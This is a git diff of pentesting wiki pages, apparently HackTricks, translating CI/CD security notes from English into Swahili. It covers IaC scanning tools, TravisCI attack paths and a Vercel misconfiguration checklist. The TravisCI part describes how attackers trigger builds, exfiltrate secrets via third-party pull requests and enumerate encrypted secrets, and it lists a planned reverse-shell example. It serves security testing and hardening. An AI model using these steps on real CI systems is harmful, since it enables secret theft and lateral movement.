-**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
+**Checkov** ni chombo cha uchambuzi wa msimbo wa statiki kwa miundombinu kama msimbo (IaC) na pia chombo cha uchambuzi wa muundo wa programu (SCA) kwa picha na pakiti za chanzo wazi.
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
-
-It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
+Inachanganua miundombinu ya wingu iliyotolewa kwa kutumia [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), au [OpenTofu](https://opentofu.org/) na kugundua usalama na makosa ya kufuata sheria kwa kutumia uchambuzi wa msingi wa grafu.
+Inafanya [Uchambuzi wa Muundo wa Programu (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) ambayo ni uchambuzi wa pakiti za chanzo wazi na picha kwa ajili ya Uthibitisho wa Hatari na Ufunuo wa Pamoja (CVEs).
```bash
pip install checkov
checkov -d /path/to/folder
```
-
### [terraform-compliance](https://github.com/terraform-compliance/cli)
-From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
+From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` ni mfumo wa majaribio mwepesi, unaolenga usalama na ufuatiliaji wa sheria dhidi ya terraform ili kuwezesha uwezo wa majaribio hasi kwa miundombinu yako kama msimbo.
-- **compliance:** Ensure the implemented code is following security standards, your own custom standards
-- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
-- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
-- **pre-deploy:** it validates your code before it is deployed
-- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
-- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
+- **compliance:** Hakikisha kwamba msimbo ulioanzishwa unafuata viwango vya usalama, viwango vyako vya kawaida
+- **behaviour driven development:** Tuna BDD kwa karibu kila kitu, kwa nini isiwe kwa IaC?
+- **portable:** sakinisha tu kutoka `pip` au uendeshe kupitia `docker`. Tazama [Installation](https://terraform-compliance.com/pages/installation/)
+- **pre-deploy:** inathibitisha msimbo wako kabla ya kupelekwa
+- **easy to integrate:** inaweza kukimbia katika mchakato wako (au katika git hooks) ili kuhakikisha kwamba mawasilisho yote yamehakikishwa.
+- **segregation of duty:** unaweza kuweka majaribio yako katika hazina tofauti ambapo timu tofauti inawajibika.
> [!NOTE]
-> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
-
+> Kwa bahati mbaya ikiwa msimbo unatumia baadhi ya watoa huduma ambao huna ufikiaji nao huwezi kufanya `terraform plan` na kuendesha chombo hiki.
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```
-
### [tfsec](https://github.com/aquasecurity/tfsec)
-From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
-
-- āļø Checks for misconfigurations across all major (and some minor) cloud providers
-- ā Hundreds of built-in rules
-- šŖ Scans modules (local and remote)
-- ā Evaluates HCL expressions as well as literal values
-- āŖļø Evaluates Terraform functions e.g. `concat()`
-- š Evaluates relationships between Terraform resources
-- š§° Compatible with the Terraform CDK
-- š Applies (and embellishes) user-defined Rego policies
-- š Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
-- š ļø Configurable (via CLI flags and/or config file)
-- ā” Very fast, capable of quickly scanning huge repositories
+From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec inatumia uchambuzi wa statiki wa msimbo wako wa terraform ili kugundua uwezekano wa makosa ya usanidi.
+- āļø Inakagua makosa ya usanidi katika watoa huduma wote wakuu (na wengine wadogo)
+- ā Mamia ya sheria zilizojengwa ndani
+- šŖ Inachunguza moduli (za ndani na za mbali)
+- ā Inakadiria maelezo ya HCL pamoja na thamani halisi
+- āŖļø Inakadiria kazi za Terraform mfano `concat()`
+- š Inakadiria uhusiano kati ya rasilimali za Terraform
+- š§° Inafaa na Terraform CDK
+- š Inatumia (na kuimarisha) sera za Rego zilizofafanuliwa na mtumiaji
+- š Inasaidia muundo mbalimbali wa matokeo: nzuri (ya default), JSON, SARIF, CSV, CheckStyle, JUnit, maandiko, Gif.
+- š ļø Inaweza kubadilishwa (kupitia bendera za CLI na/au faili ya usanidi)
+- ā” Haraka sana, ina uwezo wa kuchunguza haraka hifadhi kubwa
```bash
brew install tfsec
tfsec /path/to/folder
```
-
### [KICKS](https://github.com/Checkmarx/kics)
-Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
-
-**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
+Pata udhaifu wa usalama, masuala ya ulinganifu, na makosa ya usanidi wa miundombinu mapema katika mzunguko wa maendeleo wa miundombinu yako kama msimbo kwa kutumia **KICS** kutoka Checkmarx.
+**KICS** inasimama kwa **K**uendelea **I**miundombinu kama **C**ode **S**alama, ni chanzo wazi na ni lazima kuwa nacho kwa mradi wowote wa wingu asilia.
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
-
### [Terrascan](https://github.com/tenable/terrascan)
-From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
-
-- Seamlessly scan infrastructure as code for misconfigurations.
-- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
-- Detect security vulnerabilities and compliance violations.
-- Mitigate risks before provisioning cloud native infrastructure.
-- Offers flexibility to run locally or integrate with your CI\CD.
+Kutoka kwa [**docs**](https://github.com/tenable/terrascan): Terrascan ni mchambuzi wa msimbo wa statiki kwa Miundombinu kama Msimbo. Terrascan inakuwezesha:
+- Kuchunguza miundombinu kama msimbo kwa makosa ya usanidi bila shida.
+- Kufuatilia miundombinu ya wingu iliyotolewa kwa mabadiliko ya usanidi yanayoleta mabadiliko ya hali, na inaruhusu kurudi kwenye hali salama.
+- Kugundua udhaifu wa usalama na ukiukaji wa kufuata.
+- Kupunguza hatari kabla ya kutoa miundombinu asilia ya wingu.
+- Inatoa kubadilika kukimbia kwa ndani au kuungana na CI\CD yako.
```bash
brew install terrascan
```
-
-## References
+## Marejeo
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -310,7 +280,3 @@ brew install terrascan
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md
index 63a3bb5c8..8d5b20e54 100644
--- a/src/pentesting-ci-cd/todo.md
+++ b/src/pentesting-ci-cd/todo.md
@@ -2,7 +2,7 @@
{{#include ../banners/hacktricks-training.md}}
-Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+Github PRs zinakaribishwa zikielezea jinsi ya (kutumia vibaya) hizo platforms kutoka kwa mtazamo wa mshambuliaji
- Drone
- TeamCity
@@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke
- Rancher
- Mesosphere
- Radicle
-- Any other CI/CD platform...
+- Jukwaa lolote lingine la CI/CD...
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md
index cff623392..f17d29b9c 100644
--- a/src/pentesting-ci-cd/travisci-security/README.md
+++ b/src/pentesting-ci-cd/travisci-security/README.md
@@ -4,7 +4,7 @@
## What is TravisCI
-**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+**Travis CI** ni huduma ya **kuendelea kuunganisha** iliyohifadhiwa au kwenye **premises** inayotumika kujenga na kujaribu miradi ya programu iliyohifadhiwa kwenye **jukwaa tofauti za git**.
{{#ref}}
basic-travisci-information.md
@@ -14,48 +14,48 @@ basic-travisci-information.md
### Triggers
-To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+Ili kuanzisha shambulio, kwanza unahitaji kujua jinsi ya kuanzisha ujenzi. Kwa kawaida, TravisCI itafanya **kuanzisha ujenzi kwenye push na pull requests**:
.png>)
#### Cron Jobs
-If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+Ikiwa una ufikiaji wa programu ya wavuti, unaweza **kweka crons kuendesha ujenzi**, hii inaweza kuwa muhimu kwa kudumu au kuanzisha ujenzi:
.png>)
> [!NOTE]
-> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+> Inaonekana haiwezekani kuweka crons ndani ya `.travis.yml` kulingana na [hii](https://github.com/travis-ci/travis-ci/issues/9162).
### Third Party PR
-TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+TravisCI kwa kawaida inazima kushiriki mabadiliko ya mazingira na PRs zinazotoka kwa wahusika wengine, lakini mtu anaweza kuweza kuziwasha na kisha unaweza kuunda PRs kwa repo na kuhamasisha siri:
.png>)
### Dumping Secrets
-As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+Kama ilivyoelezwa kwenye ukurasa wa [**basic information**](basic-travisci-information.md), kuna aina 2 za siri. **Siri za Mabadiliko ya Mazingira** (ambazo ziko kwenye ukurasa wa wavuti) na **siri za kawaida zilizofichwa**, ambazo zimehifadhiwa ndani ya faili ya `.travis.yml` kama base64 (kumbuka kwamba zote zikiwa zimehifadhiwa kwa siri zitakuwa kama mabadiliko ya mazingira kwenye mashine za mwisho).
-- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
-- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+- Ili **kuhesabu siri** zilizowekwa kama **Mabadiliko ya Mazingira**, nenda kwenye **mipangilio** ya **mradi** na angalia orodha. Hata hivyo, kumbuka kwamba mabadiliko yote ya mazingira ya mradi yaliyowekwa hapa yataonekana unapofanya ujenzi.
+- Ili kuhesabu **siri za kawaida zilizofichwa**, bora unachoweza kufanya ni **kuangalia faili ya `.travis.yml`**.
+- Ili **kuhesabu faili zilizofichwa**, unaweza kuangalia kwa **faili za `.enc`** kwenye repo, kwa mistari inayofanana na `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` kwenye faili ya usanidi, au kwa **iv na funguo zilizofichwa** katika **Mabadiliko ya Mazingira** kama:
.png>)
### TODO:
-- Example build with reverse shell running on Windows/Mac/Linux
-- Example build leaking the env base64 encoded in the logs
+- Mfano wa ujenzi ukiwa na reverse shell ikifanya kazi kwenye Windows/Mac/Linux
+- Mfano wa ujenzi ukivuja mabadiliko ya mazingira yaliyofichwa kwa base64 kwenye kumbukumbu
### TravisCI Enterprise
-If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+Ikiwa mshambuliaji atakutana na mazingira yanayotumia **TravisCI enterprise** (maelezo zaidi kuhusu hii kwenye [**basic information**](basic-travisci-information.md#travisci-enterprise)), ataweza **kuanzisha ujenzi kwenye Worker.** Hii inamaanisha kwamba mshambuliaji ataweza kuhamasisha kwa upande wa server hiyo kutoka ambayo anaweza:
-- escape to the host?
-- compromise kubernetes?
-- compromise other machines running in the same network?
-- compromise new cloud credentials?
+- kutoroka kwa mwenyeji?
+- kuathiri kubernetes?
+- kuathiri mashine nyingine zinazofanya kazi kwenye mtandao huo huo?
+- kuathiri akreditivu mpya za wingu?
## References
@@ -63,7 +63,3 @@ If an attacker ends in an environment which uses **TravisCI enterprise** (more i
- [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
index 46b10bf38..5111b0454 100644
--- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
+++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -4,45 +4,42 @@
## Access
-TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
+TravisCI moja kwa moja inajumuisha na majukwaa tofauti ya git kama Github, Bitbucket, Assembla, na Gitlab. Itamuuliza mtumiaji kutoa ruhusa kwa TravisCI kuweza kufikia repos anazotaka kuunganisha na TravisCI.
-For example, in Github it will ask for the following permissions:
+Kwa mfano, katika Github itahitaji ruhusa zifuatazo:
-- `user:email` (read-only)
-- `read:org` (read-only)
-- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
+- `user:email` (kusoma tu)
+- `read:org` (kusoma tu)
+- `repo`: Inatoa ruhusa ya kusoma na kuandika kwa msimbo, hali za kujitolea, washirikishi, na hali za kutekeleza kwa hazina za umma na za kibinafsi na mashirika.
## Encrypted Secrets
### Environment Variables
-In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
+Katika TravisCI, kama ilivyo katika majukwaa mengine ya CI, inawezekana **kuhifadhi siri kwenye kiwango cha repo** ambazo zitahifadhiwa kwa njia ya siri na **kuondolewa na kusukumwa kwenye mabadiliko ya mazingira** ya mashine inayotekeleza ujenzi.
.png>)
-It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
+Inawezekana kuashiria **matawi ambayo siri zitapatikana** (kwa kawaida yote) na pia kama TravisCI **inapaswa kuficha thamani yake** ikiwa itaonekana **katika kumbukumbu** (kwa kawaida itafanya hivyo).
### Custom Encrypted Secrets
-For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repositoryās **public key available** to those who have **access** to the repository.
-
-You can access the public key of one repo with:
+Kwa **kila repo** TravisCI inazalisha **RSA keypair**, **inaweka** ile **binafsi**, na inafanya **funguo za umma za hazina** kupatikana kwa wale walio na **ufikiaji** wa hazina hiyo.
+Unaweza kufikia funguo za umma za repo moja kwa:
```
travis pubkey -r /
travis pubkey -r carlospolop/t-ci-test
```
-
-Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
+Kisha, unaweza kutumia mipangilio hii **kuweka siri na kuziongeza kwenye `.travis.yaml`**. Siri zitakuwa **zinatolewa wakati ujenzi unafanywa** na zinapatikana katika **mabadiliko ya mazingira**.
.png>)
-Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
+Kumbuka kwamba siri zilizowekwa kwa njia hii hazitaonekana kwenye orodha ya mabadiliko ya mazingira ya mipangilio.
-### Custom Encrypted Files
-
-Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
+### Faili za Kijalala Zilizowekwa
+Kwa njia ile ile kama hapo awali, TravisCI pia inaruhusu **kuweka faili na kisha kuzitoa wakati wa ujenzi**:
```
travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
@@ -52,7 +49,7 @@ storing secure env variables for decryption
Please add the following to your build script (before_install stage in your .travis.yml, for instance):
- openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
+openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
Pro Tip: You can add it automatically by running with --add.
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository.
Make sure not to add super_secret.txt to the git repository.
Commit all changes to your .travis.yml.
```
-
Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
.png>)
## TravisCI Enterprise
-Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the āserverā version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
+Travis CI Enterprise ni **toleo la ndani la Travis CI**, ambalo unaweza kupeleka **katika miundombinu yako**. Fikiria kuhusu toleo la 'server' la Travis CI. Kutumia Travis CI kunakuwezesha kuwezesha mfumo rahisi wa Kuendelea Kuunganisha/Kuendelea Kuweka (CI/CD) katika mazingira, ambayo unaweza kuunda na kulinda kama unavyotaka.
-**Travis CI Enterprise consists of two major parts:**
+**Travis CI Enterprise ina sehemu mbili kuu:**
-1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
-2. TCI **Worker** and build environment images (also called OS images).
+1. TCI **huduma** (au TCI Core Services), inayohusika na kuunganishwa na mifumo ya kudhibiti toleo, kuidhinisha ujenzi, kupanga kazi za ujenzi, nk.
+2. TCI **Worker** na picha za mazingira ya ujenzi (pia huitwa picha za OS).
-**TCI Core services require the following:**
+**Huduma za TCI Core zinahitaji yafuatayo:**
-1. A **PostgreSQL11** (or later) database.
-2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
-3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
+1. Hifadhidata ya **PostgreSQL11** (au baadaye).
+2. Miundombinu ya kupeleka klasta ya Kubernetes; inaweza kupelekwa katika klasta ya seva au katika mashine moja ikiwa inahitajika.
+3. Kulingana na mipangilio yako, unaweza kutaka kupeleka na kuunda baadhi ya vipengele mwenyewe, mfano, RabbitMQ - angalia [Kuweka Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) kwa maelezo zaidi.
-**TCI Worker requires the following:**
+**Worker wa TCI unahitaji yafuatayo:**
-1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
-2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
+1. Miundombinu ambapo picha ya docker inayojumuisha **Worker na picha ya ujenzi iliyounganishwa inaweza kupelekwa**.
+2. Uunganisho kwa baadhi ya vipengele vya Huduma za Msingi za Travis CI - angalia [Kuweka Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) kwa maelezo zaidi.
-The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
+Kiasi cha picha za OS za TCI Worker na mazingira ya ujenzi zilizopelekwa kitaamua uwezo wa jumla wa sambamba wa kupeleka Travis CI Enterprise katika miundombinu yako.
.png>)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md
index 16dc93da7..5c143a8cf 100644
--- a/src/pentesting-ci-cd/vercel-security.md
+++ b/src/pentesting-ci-cd/vercel-security.md
@@ -4,160 +4,160 @@
## Basic Information
-In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**.
+Katika Vercel, **Team** ni **environment** kamili inayomilikiwa na mteja na **project** ni **application**.
-For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also).
+Kwa ajili ya ukaguzi wa kuimarisha wa **Vercel**, unahitaji kuomba mtumiaji mwenye **Viewer role permission** au angalau **Project viewer permission over the projects** ili kuangalia (ikiwa unahitaji tu kuangalia miradi na si usanidi wa Team pia).
## Project Settings
### General
-**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
+**Purpose:** Kusimamia mipangilio ya msingi ya mradi kama vile jina la mradi, mfumo, na mipangilio ya kujenga.
#### Security Configurations:
- **Transfer**
- - **Misconfiguration:** Allows to transfer the project to another team
- - **Risk:** An attacker could steal the project
+- **Misconfiguration:** Inaruhusu kuhamasisha mradi kwa timu nyingine
+- **Risk:** Mshambuliaji anaweza kuiba mradi
- **Delete Project**
- - **Misconfiguration:** Allows to delete the project
- - **Risk:** Delete the prject
+- **Misconfiguration:** Inaruhusu kufuta mradi
+- **Risk:** Futa mradi
---
### Domains
-**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
+**Purpose:** Kusimamia maeneo maalum, mipangilio ya DNS, na mipangilio ya SSL.
#### Security Configurations:
- **DNS Configuration Errors**
- - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
- - **Risk:** Domain hijacking, traffic interception, and phishing attacks.
+- **Misconfiguration:** Rekodi za DNS zisizo sahihi (A, CNAME) zinazoelekeza kwenye seva za uhalifu.
+- **Risk:** Hijacking ya domain, kukamata trafiki, na mashambulizi ya phishing.
- **SSL/TLS Certificate Management**
- - **Misconfiguration:** Using weak or expired SSL/TLS certificates.
- - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
+- **Misconfiguration:** Kutumia vyeti dhaifu au vilivyokwisha muda.
+- **Risk:** Kuwa hatarini kwa mashambulizi ya mtu katikati (MITM), kuathiri uaminifu wa data na faragha.
- **DNSSEC Implementation**
- - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
+- **Misconfiguration:** Kukosa kuwezesha DNSSEC au mipangilio isiyo sahihi ya DNSSEC.
+- **Risk:** Kuongezeka kwa uwezekano wa DNS spoofing na mashambulizi ya cache poisoning.
- **Environment used per domain**
- - **Misconfiguration:** Change the environment used by the domain in production.
- - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
+- **Misconfiguration:** Kubadilisha mazingira yanayotumika na domain katika uzalishaji.
+- **Risk:** Kuonyesha siri au kazi zinazoweza kuwa hazipatikani katika uzalishaji.
---
### Environments
-**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
+**Purpose:** Mwelekeo wa mazingira tofauti (Development, Preview, Production) na mipangilio maalum na vigezo.
#### Security Configurations:
- **Environment Isolation**
- - **Misconfiguration:** Sharing environment variables across environments.
- - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
+- **Misconfiguration:** Kushiriki vigezo vya mazingira kati ya mazingira.
+- **Risk:** Kuvuja kwa siri za uzalishaji katika mazingira ya maendeleo au mapitio, kuongezeka kwa uwezekano wa kufichuliwa.
- **Access to Sensitive Environments**
- - **Misconfiguration:** Allowing broad access to production environments.
- - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
+- **Misconfiguration:** Kuruhusu ufikiaji mpana kwa mazingira ya uzalishaji.
+- **Risk:** Mabadiliko yasiyoidhinishwa au ufikiaji wa maombi ya moja kwa moja, kupelekea uwezekano wa kushindwa au uvunjaji wa data.
---
### Environment Variables
-**Purpose:** Manage environment-specific variables and secrets used by the application.
+**Purpose:** Kusimamia vigezo maalum vya mazingira na siri zinazotumika na application.
#### Security Configurations:
- **Exposing Sensitive Variables**
- - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Misconfiguration:** Kuongeza alama ya `NEXT_PUBLIC_` kwa vigezo nyeti, na kuifanya ipatikane upande wa mteja.
+- **Risk:** Kuonyeshwa kwa funguo za API, akidi za database, au data nyingine nyeti kwa umma, kupelekea uvunjaji wa data.
- **Sensitive disabled**
- - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** Ikiwa imezimwa (kawaida) inawezekana kusoma thamani za siri zilizozalishwa.
+- **Risk:** Kuongezeka kwa uwezekano wa kufichuliwa kwa bahati mbaya au ufikiaji usioidhinishwa wa taarifa nyeti.
- **Shared Environment Variables**
- - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** Hizi ni vigezo vya mazingira vilivyowekwa katika kiwango cha Team na vinaweza pia kuwa na taarifa nyeti.
+- **Risk:** Kuongezeka kwa uwezekano wa kufichuliwa kwa bahati mbaya au ufikiaji usioidhinishwa wa taarifa nyeti.
---
### Git
-**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
+**Purpose:** Kuunda mipangilio ya Git repository, ulinzi wa matawi, na vichocheo vya kutekeleza.
#### Security Configurations:
- **Ignored Build Step (TODO)**
- - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
- - **Risk:** TBD
+- **Misconfiguration:** Inaonekana kama chaguo hili linaruhusu kuunda script/maagizo ya bash ambayo yatatekelezwa wakati commit mpya inasukumwa katika Github, ambayo inaweza kuruhusu RCE.
+- **Risk:** TBD
---
### Integrations
-**Purpose:** Connect third-party services and tools to enhance project functionalities.
+**Purpose:** Kuunganisha huduma na zana za upande wa tatu ili kuboresha kazi za mradi.
#### Security Configurations:
- **Insecure Third-Party Integrations**
- - **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
+- **Misconfiguration:** Kuunganisha na huduma za upande wa tatu zisizoaminika au zisizo salama.
+- **Risk:** Kuanzisha udhaifu, kuvuja kwa data, au milango ya nyuma kupitia uunganisho ulioathirika.
- **Over-Permissioned Integrations**
- - **Misconfiguration:** Granting excessive permissions to integrated services.
- - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
+- **Misconfiguration:** Kutoa ruhusa nyingi kwa huduma zilizounganishwa.
+- **Risk:** Ufikiaji usioidhinishwa wa rasilimali za mradi, urekebishaji wa data, au usumbufu wa huduma.
- **Lack of Integration Monitoring**
- - **Misconfiguration:** Failing to monitor and audit third-party integrations.
- - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
+- **Misconfiguration:** Kukosa kufuatilia na kukagua uunganisho wa upande wa tatu.
